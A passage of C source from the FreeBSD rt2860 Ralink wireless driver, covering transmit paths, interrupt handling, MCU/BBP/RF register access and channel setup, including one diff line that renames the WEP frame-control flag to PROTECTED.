= RAL_READ(sc, RT2860_INT_STATUS); if (__predict_false(r == 0xffffffff)) { RAL_UNLOCK(sc); return; /* device likely went away */ } if (r == 0) { RAL_UNLOCK(sc); return; /* not for us */ } /* acknowledge interrupts */ RAL_WRITE(sc, RT2860_INT_STATUS, r); if (r & RT2860_TX_RX_COHERENT) rt2860_intr_coherent(sc); if (r & RT2860_MAC_INT_2) /* TX status */ rt2860_drain_stats_fifo(sc); if (r & RT2860_TX_DONE_INT5) rt2860_tx_intr(sc, 5); if (r & RT2860_RX_DONE_INT) rt2860_rx_intr(sc); if (r & RT2860_TX_DONE_INT4) rt2860_tx_intr(sc, 4); if (r & RT2860_TX_DONE_INT3) rt2860_tx_intr(sc, 3); if (r & RT2860_TX_DONE_INT2) rt2860_tx_intr(sc, 2); if (r & RT2860_TX_DONE_INT1) rt2860_tx_intr(sc, 1); if (r & RT2860_TX_DONE_INT0) rt2860_tx_intr(sc, 0); if (r & RT2860_MAC_INT_0) /* TBTT */ rt2860_tbtt_intr(sc); if (r & RT2860_MAC_INT_3) /* Auto wakeup */ /* TBD wakeup */; if (r & RT2860_MAC_INT_4) /* GP timer */ rt2860_gp_intr(sc); RAL_UNLOCK(sc); } static int rt2860_tx(struct rt2860_softc *sc, struct mbuf *m, struct ieee80211_node *ni) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = ni->ni_vap; struct rt2860_tx_ring *ring; struct rt2860_tx_data *data; struct rt2860_txd *txd; struct rt2860_txwi *txwi; struct ieee80211_frame *wh; const struct ieee80211_txparam *tp; struct ieee80211_key *k; struct mbuf *m1; bus_dma_segment_t segs[RT2860_MAX_SCATTER]; bus_dma_segment_t *seg; u_int hdrlen; uint16_t qos, dur; uint8_t type, qsel, mcs, pid, tid, qid; int i, nsegs, ntxds, pad, rate, ridx, error; /* the data pool contains at least one element, pick the first */ data = SLIST_FIRST(&sc->data_pool); wh = mtod(m, struct ieee80211_frame *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m); if (k == NULL) { m_freem(m); return ENOBUFS; } /* packet header may have moved, reset our local pointer */ wh = mtod(m, struct ieee80211_frame *); } hdrlen = ieee80211_anyhdrsize(wh); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; tp = &vap->iv_txparms[ieee80211_chan2mode(ni->ni_chan)]; if (IEEE80211_IS_MULTICAST(wh->i_addr1)) { rate = tp->mcastrate; } else if (m->m_flags & M_EAPOL) { rate = tp->mgmtrate; } else if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) { rate = tp->ucastrate; } else { (void) ieee80211_ratectl_rate(ni, NULL, 0); rate = ni->ni_txrate; } rate &= IEEE80211_RATE_VAL; qid = M_WME_GETAC(m); if (IEEE80211_QOS_HAS_SEQ(wh)) { qos = ((const struct ieee80211_qosframe *)wh)->i_qos[0]; tid = qos & IEEE80211_QOS_TID; } else { qos = 0; tid = 0; } ring = &sc->txq[qid]; ridx = ieee80211_legacy_rate_lookup(ic->ic_rt, rate); /* get MCS code from rate index */ mcs = rt2860_rates[ridx].mcs; /* setup TX Wireless Information */ txwi = data->txwi; txwi->flags = 0; /* let HW generate seq numbers for non-QoS frames */ txwi->xflags = qos ? 0 : RT2860_TX_NSEQ; if (type == IEEE80211_FC0_TYPE_DATA) txwi->wcid = IEEE80211_AID(ni->ni_associd); else txwi->wcid = 0xff; txwi->len = htole16(m->m_pkthdr.len); if (rt2860_rates[ridx].phy == IEEE80211_T_DS) { txwi->phy = htole16(RT2860_PHY_CCK); if (ridx != RT2860_RIDX_CCK1 && (ic->ic_flags & IEEE80211_F_SHPREAMBLE)) mcs |= RT2860_PHY_SHPRE; } else txwi->phy = htole16(RT2860_PHY_OFDM); txwi->phy |= htole16(mcs); /* * We store the MCS code into the driver-private PacketID field. * The PacketID is latched into TX_STAT_FIFO when Tx completes so * that we know at which initial rate the frame was transmitted. 
* We add 1 to the MCS code because setting the PacketID field to * 0 means that we don't want feedback in TX_STAT_FIFO. */ pid = (mcs + 1) & 0xf; txwi->len |= htole16(pid << RT2860_TX_PID_SHIFT); /* check if RTS/CTS or CTS-to-self protection is required */ if (!IEEE80211_IS_MULTICAST(wh->i_addr1) && (m->m_pkthdr.len + IEEE80211_CRC_LEN > vap->iv_rtsthreshold || ((ic->ic_flags & IEEE80211_F_USEPROT) && rt2860_rates[ridx].phy == IEEE80211_T_OFDM))) txwi->txop = RT2860_TX_TXOP_HT; else txwi->txop = RT2860_TX_TXOP_BACKOFF; if (!IEEE80211_IS_MULTICAST(wh->i_addr1) && (!qos || (qos & IEEE80211_QOS_ACKPOLICY) != IEEE80211_QOS_ACKPOLICY_NOACK)) { txwi->xflags |= RT2860_TX_ACK; if (ic->ic_flags & IEEE80211_F_SHPREAMBLE) dur = rt2860_rates[ridx].sp_ack_dur; else dur = rt2860_rates[ridx].lp_ack_dur; *(uint16_t *)wh->i_dur = htole16(dur); } /* ask MAC to insert timestamp into probe responses */ if ((wh->i_fc[0] & (IEEE80211_FC0_TYPE_MASK | IEEE80211_FC0_SUBTYPE_MASK)) == (IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_PROBE_RESP)) /* NOTE: beacons do not pass through tx_data() */ txwi->flags |= RT2860_TX_TS; if (ieee80211_radiotap_active_vap(vap)) { struct rt2860_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = rate; if (mcs & RT2860_PHY_SHPRE) tap->wt_flags |= IEEE80211_RADIOTAP_F_SHORTPRE; ieee80211_radiotap_tx(vap, m); } pad = (hdrlen + 3) & ~3; /* copy and trim 802.11 header */ memcpy(txwi + 1, wh, hdrlen); m_adj(m, hdrlen); error = bus_dmamap_load_mbuf_sg(sc->txwi_dmat, data->map, m, segs, &nsegs, 0); if (__predict_false(error != 0 && error != EFBIG)) { device_printf(sc->sc_dev, "can't map mbuf (error %d)\n", error); m_freem(m); return error; } if (__predict_true(error == 0)) { /* determine how many TXDs are required */ ntxds = 1 + (nsegs / 2); if (ring->queued + ntxds >= RT2860_TX_RING_COUNT) { /* not enough free TXDs, force mbuf defrag */ bus_dmamap_unload(sc->txwi_dmat, data->map); error = EFBIG; } } if (__predict_false(error != 0)) { m1 = m_defrag(m, M_NOWAIT); if (m1 == NULL) { device_printf(sc->sc_dev, "could not defragment mbuf\n"); m_freem(m); return ENOBUFS; } m = m1; error = bus_dmamap_load_mbuf_sg(sc->txwi_dmat, data->map, m, segs, &nsegs, 0); if (__predict_false(error != 0)) { device_printf(sc->sc_dev, "can't map mbuf (error %d)\n", error); m_freem(m); return error; } /* determine how many TXDs are now required */ ntxds = 1 + (nsegs / 2); if (ring->queued + ntxds >= RT2860_TX_RING_COUNT) { /* this is a hopeless case, drop the mbuf! */ bus_dmamap_unload(sc->txwi_dmat, data->map); m_freem(m); return ENOBUFS; } } qsel = (qid < WME_NUM_AC) ? 
RT2860_TX_QSEL_EDCA : RT2860_TX_QSEL_MGMT; /* first segment is TXWI + 802.11 header */ txd = &ring->txd[ring->cur]; txd->sdp0 = htole32(data->paddr); txd->sdl0 = htole16(sizeof (struct rt2860_txwi) + pad); txd->flags = qsel; /* setup payload segments */ seg = &segs[0]; for (i = nsegs; i >= 2; i -= 2) { txd->sdp1 = htole32(seg->ds_addr); txd->sdl1 = htole16(seg->ds_len); seg++; ring->cur = (ring->cur + 1) % RT2860_TX_RING_COUNT; /* grab a new Tx descriptor */ txd = &ring->txd[ring->cur]; txd->sdp0 = htole32(seg->ds_addr); txd->sdl0 = htole16(seg->ds_len); txd->flags = qsel; seg++; } /* finalize last segment */ if (i > 0) { txd->sdp1 = htole32(seg->ds_addr); txd->sdl1 = htole16(seg->ds_len | RT2860_TX_LS1); } else { txd->sdl0 |= htole16(RT2860_TX_LS0); txd->sdl1 = 0; } /* remove from the free pool and link it into the SW Tx slot */ SLIST_REMOVE_HEAD(&sc->data_pool, next); data->m = m; data->ni = ni; ring->data[ring->cur] = data; bus_dmamap_sync(sc->txwi_dmat, sc->txwi_map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(sc->txwi_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_PREWRITE); DPRINTFN(4, ("sending frame qid=%d wcid=%d nsegs=%d ridx=%d\n", qid, txwi->wcid, nsegs, ridx)); ring->cur = (ring->cur + 1) % RT2860_TX_RING_COUNT; ring->queued += ntxds; if (ring->queued >= RT2860_TX_RING_COUNT) sc->qfullmsk |= 1 << qid; /* kick Tx */ RAL_WRITE(sc, RT2860_TX_CTX_IDX(qid), ring->cur); return 0; } static int rt2860_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct rt2860_softc *sc = ifp->if_softc; int error; RAL_LOCK(sc); /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { RAL_UNLOCK(sc); m_freem(m); ieee80211_free_node(ni); return ENETDOWN; } if (params == NULL) { /* * Legacy path; interpret frame contents to decide * precisely how to send the frame. */ error = rt2860_tx(sc, m, ni); } else { /* * Caller supplied explicit parameters to use in * sending the frame. */ error = rt2860_tx_raw(sc, m, ni, params); } if (error != 0) { /* NB: m is reclaimed on tx failure */ ieee80211_free_node(ni); ifp->if_oerrors++; } sc->sc_tx_timer = 5; RAL_UNLOCK(sc); return error; } static int rt2860_tx_raw(struct rt2860_softc *sc, struct mbuf *m, struct ieee80211_node *ni, const struct ieee80211_bpf_params *params) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = ni->ni_vap; struct rt2860_tx_ring *ring; struct rt2860_tx_data *data; struct rt2860_txd *txd; struct rt2860_txwi *txwi; struct ieee80211_frame *wh; struct mbuf *m1; bus_dma_segment_t segs[RT2860_MAX_SCATTER]; bus_dma_segment_t *seg; u_int hdrlen; uint16_t dur; uint8_t type, qsel, mcs, pid, tid, qid; int i, nsegs, ntxds, pad, rate, ridx, error; /* the data pool contains at least one element, pick the first */ data = SLIST_FIRST(&sc->data_pool); wh = mtod(m, struct ieee80211_frame *); hdrlen = ieee80211_hdrsize(wh); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; /* Choose a TX rate index. */ rate = params->ibp_rate0; ridx = ieee80211_legacy_rate_lookup(ic->ic_rt, rate & IEEE80211_RATE_VAL); if (ridx == (uint8_t)-1) { /* XXX fall back to mcast/mgmt rate? 
*/ m_freem(m); return EINVAL; } qid = params->ibp_pri & 3; tid = 0; ring = &sc->txq[qid]; /* get MCS code from rate index */ mcs = rt2860_rates[ridx].mcs; /* setup TX Wireless Information */ txwi = data->txwi; txwi->flags = 0; /* let HW generate seq numbers for non-QoS frames */ txwi->xflags = params->ibp_pri & 3 ? 0 : RT2860_TX_NSEQ; txwi->wcid = 0xff; txwi->len = htole16(m->m_pkthdr.len); if (rt2860_rates[ridx].phy == IEEE80211_T_DS) { txwi->phy = htole16(RT2860_PHY_CCK); if (ridx != RT2860_RIDX_CCK1 && (ic->ic_flags & IEEE80211_F_SHPREAMBLE)) mcs |= RT2860_PHY_SHPRE; } else txwi->phy = htole16(RT2860_PHY_OFDM); txwi->phy |= htole16(mcs); /* * We store the MCS code into the driver-private PacketID field. * The PacketID is latched into TX_STAT_FIFO when Tx completes so * that we know at which initial rate the frame was transmitted. * We add 1 to the MCS code because setting the PacketID field to * 0 means that we don't want feedback in TX_STAT_FIFO. */ pid = (mcs + 1) & 0xf; txwi->len |= htole16(pid << RT2860_TX_PID_SHIFT); /* check if RTS/CTS or CTS-to-self protection is required */ if (params->ibp_flags & IEEE80211_BPF_RTS || params->ibp_flags & IEEE80211_BPF_CTS) txwi->txop = RT2860_TX_TXOP_HT; else txwi->txop = RT2860_TX_TXOP_BACKOFF; if ((params->ibp_flags & IEEE80211_BPF_NOACK) == 0) { txwi->xflags |= RT2860_TX_ACK; if (ic->ic_flags & IEEE80211_F_SHPREAMBLE) dur = rt2860_rates[ridx].sp_ack_dur; else dur = rt2860_rates[ridx].lp_ack_dur; *(uint16_t *)wh->i_dur = htole16(dur); } /* ask MAC to insert timestamp into probe responses */ if ((wh->i_fc[0] & (IEEE80211_FC0_TYPE_MASK | IEEE80211_FC0_SUBTYPE_MASK)) == (IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_PROBE_RESP)) /* NOTE: beacons do not pass through tx_data() */ txwi->flags |= RT2860_TX_TS; if (ieee80211_radiotap_active_vap(vap)) { struct rt2860_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = rate; if (mcs & RT2860_PHY_SHPRE) tap->wt_flags |= IEEE80211_RADIOTAP_F_SHORTPRE; ieee80211_radiotap_tx(vap, m); } pad = (hdrlen + 3) & ~3; /* copy and trim 802.11 header */ memcpy(txwi + 1, wh, hdrlen); m_adj(m, hdrlen); error = bus_dmamap_load_mbuf_sg(sc->txwi_dmat, data->map, m, segs, &nsegs, 0); if (__predict_false(error != 0 && error != EFBIG)) { device_printf(sc->sc_dev, "can't map mbuf (error %d)\n", error); m_freem(m); return error; } if (__predict_true(error == 0)) { /* determine how many TXDs are required */ ntxds = 1 + (nsegs / 2); if (ring->queued + ntxds >= RT2860_TX_RING_COUNT) { /* not enough free TXDs, force mbuf defrag */ bus_dmamap_unload(sc->txwi_dmat, data->map); error = EFBIG; } } if (__predict_false(error != 0)) { m1 = m_defrag(m, M_NOWAIT); if (m1 == NULL) { device_printf(sc->sc_dev, "could not defragment mbuf\n"); m_freem(m); return ENOBUFS; } m = m1; error = bus_dmamap_load_mbuf_sg(sc->txwi_dmat, data->map, m, segs, &nsegs, 0); if (__predict_false(error != 0)) { device_printf(sc->sc_dev, "can't map mbuf (error %d)\n", error); m_freem(m); return error; } /* determine how many TXDs are now required */ ntxds = 1 + (nsegs / 2); if (ring->queued + ntxds >= RT2860_TX_RING_COUNT) { /* this is a hopeless case, drop the mbuf! */ bus_dmamap_unload(sc->txwi_dmat, data->map); m_freem(m); return ENOBUFS; } } qsel = (qid < WME_NUM_AC) ? 
RT2860_TX_QSEL_EDCA : RT2860_TX_QSEL_MGMT; /* first segment is TXWI + 802.11 header */ txd = &ring->txd[ring->cur]; txd->sdp0 = htole32(data->paddr); txd->sdl0 = htole16(sizeof (struct rt2860_txwi) + pad); txd->flags = qsel; /* setup payload segments */ seg = &segs[0]; for (i = nsegs; i >= 2; i -= 2) { txd->sdp1 = htole32(seg->ds_addr); txd->sdl1 = htole16(seg->ds_len); seg++; ring->cur = (ring->cur + 1) % RT2860_TX_RING_COUNT; /* grab a new Tx descriptor */ txd = &ring->txd[ring->cur]; txd->sdp0 = htole32(seg->ds_addr); txd->sdl0 = htole16(seg->ds_len); txd->flags = qsel; seg++; } /* finalize last segment */ if (i > 0) { txd->sdp1 = htole32(seg->ds_addr); txd->sdl1 = htole16(seg->ds_len | RT2860_TX_LS1); } else { txd->sdl0 |= htole16(RT2860_TX_LS0); txd->sdl1 = 0; } /* remove from the free pool and link it into the SW Tx slot */ SLIST_REMOVE_HEAD(&sc->data_pool, next); data->m = m; data->ni = ni; ring->data[ring->cur] = data; bus_dmamap_sync(sc->txwi_dmat, sc->txwi_map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(sc->txwi_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_PREWRITE); DPRINTFN(4, ("sending frame qid=%d wcid=%d nsegs=%d ridx=%d\n", qid, txwi->wcid, nsegs, ridx)); ring->cur = (ring->cur + 1) % RT2860_TX_RING_COUNT; ring->queued += ntxds; if (ring->queued >= RT2860_TX_RING_COUNT) sc->qfullmsk |= 1 << qid; /* kick Tx */ RAL_WRITE(sc, RT2860_TX_CTX_IDX(qid), ring->cur); return 0; } static void rt2860_start(struct ifnet *ifp) { struct rt2860_softc *sc = ifp->if_softc; RAL_LOCK(sc); rt2860_start_locked(ifp); RAL_UNLOCK(sc); } static void rt2860_start_locked(struct ifnet *ifp) { struct rt2860_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mbuf *m; RAL_LOCK_ASSERT(sc); if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0 || (ifp->if_drv_flags & IFF_DRV_OACTIVE)) return; for (;;) { if (SLIST_EMPTY(&sc->data_pool) || sc->qfullmsk != 0) { ifp->if_drv_flags |= IFF_DRV_OACTIVE; break; } IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; ni = (struct ieee80211_node *)m->m_pkthdr.rcvif; if (rt2860_tx(sc, m, ni) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; continue; } sc->sc_tx_timer = 5; } } static void rt2860_watchdog(void *arg) { struct rt2860_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; RAL_LOCK_ASSERT(sc); KASSERT(ifp->if_drv_flags & IFF_DRV_RUNNING, ("not running")); if (sc->sc_invalid) /* card ejected */ return; if (sc->sc_tx_timer > 0 && --sc->sc_tx_timer == 0) { if_printf(ifp, "device timeout\n"); rt2860_stop_locked(sc); rt2860_init_locked(sc); ifp->if_oerrors++; return; } callout_reset(&sc->watchdog_ch, hz, rt2860_watchdog, sc); } static int rt2860_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct rt2860_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *)data; int error = 0, startall = 0; switch (cmd) { case SIOCSIFFLAGS: RAL_LOCK(sc); if (ifp->if_flags & IFF_UP) { if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { rt2860_init_locked(sc); startall = 1; } else rt2860_update_promisc(ifp); } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) rt2860_stop_locked(sc); } RAL_UNLOCK(sc); if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCSIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return error; } /* * Reading and writing from/to the BBP is different from RT2560 and RT2661. 
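* (On those older chips the BBP is presumably driven directly through a CSR.)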
* We access the BBP through the 8051 microcontroller unit which means that * the microcode must be loaded first. */ void rt2860_mcu_bbp_write(struct rt2860_softc *sc, uint8_t reg, uint8_t val) { int ntries; for (ntries = 0; ntries < 100; ntries++) { if (!(RAL_READ(sc, RT2860_H2M_BBPAGENT) & RT2860_BBP_CSR_KICK)) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "could not write to BBP through MCU\n"); return; } RAL_WRITE(sc, RT2860_H2M_BBPAGENT, RT2860_BBP_RW_PARALLEL | RT2860_BBP_CSR_KICK | reg << 8 | val); RAL_BARRIER_WRITE(sc); rt2860_mcu_cmd(sc, RT2860_MCU_CMD_BBP, 0, 0); DELAY(1000); } uint8_t rt2860_mcu_bbp_read(struct rt2860_softc *sc, uint8_t reg) { uint32_t val; int ntries; for (ntries = 0; ntries < 100; ntries++) { if (!(RAL_READ(sc, RT2860_H2M_BBPAGENT) & RT2860_BBP_CSR_KICK)) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "could not read from BBP through MCU\n"); return 0; } RAL_WRITE(sc, RT2860_H2M_BBPAGENT, RT2860_BBP_RW_PARALLEL | RT2860_BBP_CSR_KICK | RT2860_BBP_CSR_READ | reg << 8); RAL_BARRIER_WRITE(sc); rt2860_mcu_cmd(sc, RT2860_MCU_CMD_BBP, 0, 0); DELAY(1000); for (ntries = 0; ntries < 100; ntries++) { val = RAL_READ(sc, RT2860_H2M_BBPAGENT); if (!(val & RT2860_BBP_CSR_KICK)) return val & 0xff; DELAY(1); } device_printf(sc->sc_dev, "could not read from BBP through MCU\n"); return 0; } /* * Write to one of the 4 programmable 24-bit RF registers. */ static void rt2860_rf_write(struct rt2860_softc *sc, uint8_t reg, uint32_t val) { uint32_t tmp; int ntries; for (ntries = 0; ntries < 100; ntries++) { if (!(RAL_READ(sc, RT2860_RF_CSR_CFG0) & RT2860_RF_REG_CTRL)) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "could not write to RF\n"); return; } /* RF registers are 24-bit on the RT2860 */ tmp = RT2860_RF_REG_CTRL | 24 << RT2860_RF_REG_WIDTH_SHIFT | (val & 0x3fffff) << 2 | (reg & 3); RAL_WRITE(sc, RT2860_RF_CSR_CFG0, tmp); } static uint8_t rt3090_rf_read(struct rt2860_softc *sc, uint8_t reg) { uint32_t tmp; int ntries; for (ntries = 0; ntries < 100; ntries++) { if (!(RAL_READ(sc, RT3070_RF_CSR_CFG) & RT3070_RF_KICK)) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "could not read RF register\n"); return 0xff; } tmp = RT3070_RF_KICK | reg << 8; RAL_WRITE(sc, RT3070_RF_CSR_CFG, tmp); for (ntries = 0; ntries < 100; ntries++) { tmp = RAL_READ(sc, RT3070_RF_CSR_CFG); if (!(tmp & RT3070_RF_KICK)) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "could not read RF register\n"); return 0xff; } return tmp & 0xff; } void rt3090_rf_write(struct rt2860_softc *sc, uint8_t reg, uint8_t val) { uint32_t tmp; int ntries; for (ntries = 0; ntries < 10; ntries++) { if (!(RAL_READ(sc, RT3070_RF_CSR_CFG) & RT3070_RF_KICK)) break; DELAY(10); } if (ntries == 10) { device_printf(sc->sc_dev, "could not write to RF\n"); return; } tmp = RT3070_RF_WRITE | RT3070_RF_KICK | reg << 8 | val; RAL_WRITE(sc, RT3070_RF_CSR_CFG, tmp); } /* * Send a command to the 8051 microcontroller unit. */ int rt2860_mcu_cmd(struct rt2860_softc *sc, uint8_t cmd, uint16_t arg, int wait) { int slot, ntries; uint32_t tmp; uint8_t cid; for (ntries = 0; ntries < 100; ntries++) { if (!(RAL_READ(sc, RT2860_H2M_MAILBOX) & RT2860_H2M_BUSY)) break; DELAY(2); } if (ntries == 100) return EIO; cid = wait ? 
cmd : RT2860_TOKEN_NO_INTR; RAL_WRITE(sc, RT2860_H2M_MAILBOX, RT2860_H2M_BUSY | cid << 16 | arg); RAL_BARRIER_WRITE(sc); RAL_WRITE(sc, RT2860_HOST_CMD, cmd); if (!wait) return 0; /* wait for the command to complete */ for (ntries = 0; ntries < 200; ntries++) { tmp = RAL_READ(sc, RT2860_H2M_MAILBOX_CID); /* find the command slot */ for (slot = 0; slot < 4; slot++, tmp >>= 8) if ((tmp & 0xff) == cid) break; if (slot < 4) break; DELAY(100); } if (ntries == 200) { /* clear command and status */ RAL_WRITE(sc, RT2860_H2M_MAILBOX_STATUS, 0xffffffff); RAL_WRITE(sc, RT2860_H2M_MAILBOX_CID, 0xffffffff); return ETIMEDOUT; } /* get command status (1 means success) */ tmp = RAL_READ(sc, RT2860_H2M_MAILBOX_STATUS); tmp = (tmp >> (slot * 8)) & 0xff; DPRINTF(("MCU command=0x%02x slot=%d status=0x%02x\n", cmd, slot, tmp)); /* clear command and status */ RAL_WRITE(sc, RT2860_H2M_MAILBOX_STATUS, 0xffffffff); RAL_WRITE(sc, RT2860_H2M_MAILBOX_CID, 0xffffffff); return (tmp == 1) ? 0 : EIO; } static void rt2860_enable_mrr(struct rt2860_softc *sc) { #define CCK(mcs) (mcs) #define OFDM(mcs) (1 << 3 | (mcs)) RAL_WRITE(sc, RT2860_LG_FBK_CFG0, OFDM(6) << 28 | /* 54->48 */ OFDM(5) << 24 | /* 48->36 */ OFDM(4) << 20 | /* 36->24 */ OFDM(3) << 16 | /* 24->18 */ OFDM(2) << 12 | /* 18->12 */ OFDM(1) << 8 | /* 12-> 9 */ OFDM(0) << 4 | /* 9-> 6 */ OFDM(0)); /* 6-> 6 */ RAL_WRITE(sc, RT2860_LG_FBK_CFG1, CCK(2) << 12 | /* 11->5.5 */ CCK(1) << 8 | /* 5.5-> 2 */ CCK(0) << 4 | /* 2-> 1 */ CCK(0)); /* 1-> 1 */ #undef OFDM #undef CCK } static void rt2860_set_txpreamble(struct rt2860_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; tmp = RAL_READ(sc, RT2860_AUTO_RSP_CFG); tmp &= ~RT2860_CCK_SHORT_EN; if (ic->ic_flags & IEEE80211_F_SHPREAMBLE) tmp |= RT2860_CCK_SHORT_EN; RAL_WRITE(sc, RT2860_AUTO_RSP_CFG, tmp); } void rt2860_set_basicrates(struct rt2860_softc *sc, const struct ieee80211_rateset *rs) { #define RV(r) ((r) & IEEE80211_RATE_VAL) struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t mask = 0; uint8_t rate; int i; for (i = 0; i < rs->rs_nrates; i++) { rate = rs->rs_rates[i]; if (!(rate & IEEE80211_RATE_BASIC)) continue; mask |= 1 << ieee80211_legacy_rate_lookup(ic->ic_rt, RV(rate)); } RAL_WRITE(sc, RT2860_LEGACY_BASIC_RATE, mask); #undef RV } static void rt2860_scan_start(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct rt2860_softc *sc = ifp->if_softc; uint32_t tmp; tmp = RAL_READ(sc, RT2860_BCN_TIME_CFG); RAL_WRITE(sc, RT2860_BCN_TIME_CFG, tmp & ~(RT2860_BCN_TX_EN | RT2860_TSF_TIMER_EN | RT2860_TBTT_TIMER_EN)); rt2860_set_gp_timer(sc, 0); } static void rt2860_scan_end(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct rt2860_softc *sc = ifp->if_softc; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); if (vap->iv_state == IEEE80211_S_RUN) { rt2860_enable_tsf_sync(sc); rt2860_set_gp_timer(sc, 500); } } static void rt2860_set_channel(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct rt2860_softc *sc = ifp->if_softc; RAL_LOCK(sc); rt2860_switch_chan(sc, ic->ic_curchan); RAL_UNLOCK(sc); } static void rt2860_select_chan_group(struct rt2860_softc *sc, int group) { uint32_t tmp; uint8_t agc; rt2860_mcu_bbp_write(sc, 62, 0x37 - sc->lna[group]); rt2860_mcu_bbp_write(sc, 63, 0x37 - sc->lna[group]); rt2860_mcu_bbp_write(sc, 64, 0x37 - sc->lna[group]); rt2860_mcu_bbp_write(sc, 86, 0x00); if (group == 0) { if (sc->ext_2ghz_lna) { rt2860_mcu_bbp_write(sc, 82, 0x62); rt2860_mcu_bbp_write(sc, 75, 0x46); } 
else { rt2860_mcu_bbp_write(sc, 82, 0x84); rt2860_mcu_bbp_write(sc, 75, 0x50); } } else { if (sc->ext_5ghz_lna) { rt2860_mcu_bbp_write(sc, 82, 0xf2); rt2860_mcu_bbp_write(sc, 75, 0x46); } else { rt2860_mcu_bbp_write(sc, 82, 0xf2); rt2860_mcu_bbp_write(sc, 75, 0x50); } } tmp = RAL_READ(sc, RT2860_TX_BAND_CFG); tmp &= ~(RT2860_5G_BAND_SEL_N | RT2860_5G_BAND_SEL_P); tmp |= (group == 0) ? RT2860_5G_BAND_SEL_N : RT2860_5G_BAND_SEL_P; RAL_WRITE(sc, RT2860_TX_BAND_CFG, tmp); /* enable appropriate Power Amplifiers and Low Noise Amplifiers */ tmp = RT2860_RFTR_EN | RT2860_TRSW_EN | RT2860_LNA_PE0_EN; if (sc->nrxchains > 1) tmp |= RT2860_LNA_PE1_EN; if (sc->mac_ver == 0x3593 && sc->nrxchains > 2) tmp |= RT3593_LNA_PE2_EN; if (group == 0) { /* 2GHz */ tmp |= RT2860_PA_PE_G0_EN; if (sc->ntxchains > 1) tmp |= RT2860_PA_PE_G1_EN; if (sc->mac_ver == 0x3593 && sc->ntxchains > 2) tmp |= RT3593_PA_PE_G2_EN; } else { /* 5GHz */ tmp |= RT2860_PA_PE_A0_EN; if (sc->ntxchains > 1) tmp |= RT2860_PA_PE_A1_EN; if (sc->mac_ver == 0x3593 && sc->ntxchains > 2) tmp |= RT3593_PA_PE_A2_EN; } RAL_WRITE(sc, RT2860_TX_PIN_CFG, tmp); if (sc->mac_ver == 0x3593) { tmp = RAL_READ(sc, RT2860_GPIO_CTRL); if (sc->sc_flags & RT2860_PCIE) { tmp &= ~0x01010000; if (group == 0) tmp |= 0x00010000; } else { tmp &= ~0x00008080; if (group == 0) tmp |= 0x00000080; } tmp = (tmp & ~0x00001000) | 0x00000010; RAL_WRITE(sc, RT2860_GPIO_CTRL, tmp); } /* set initial AGC value */ if (group == 0) { /* 2GHz band */ if (sc->mac_ver >= 0x3071) agc = 0x1c + sc->lna[0] * 2; else agc = 0x2e + sc->lna[0]; } else { /* 5GHz band */ agc = 0x32 + (sc->lna[group] * 5) / 3; } rt2860_mcu_bbp_write(sc, 66, agc); DELAY(1000); } static void rt2860_set_chan(struct rt2860_softc *sc, u_int chan) { const struct rfprog *rfprog = rt2860_rf2850; uint32_t r2, r3, r4; int8_t txpow1, txpow2; u_int i; /* find the settings for this channel (we know it exists) */ for (i = 0; rfprog[i].chan != chan; i++); r2 = rfprog[i].r2; if (sc->ntxchains == 1) r2 |= 1 << 12; /* 1T: disable Tx chain 2 */ if (sc->nrxchains == 1) r2 |= 1 << 15 | 1 << 4; /* 1R: disable Rx chains 2 & 3 */ else if (sc->nrxchains == 2) r2 |= 1 << 4; /* 2R: disable Rx chain 3 */ /* use Tx power values from EEPROM */ txpow1 = sc->txpow1[i]; txpow2 = sc->txpow2[i]; 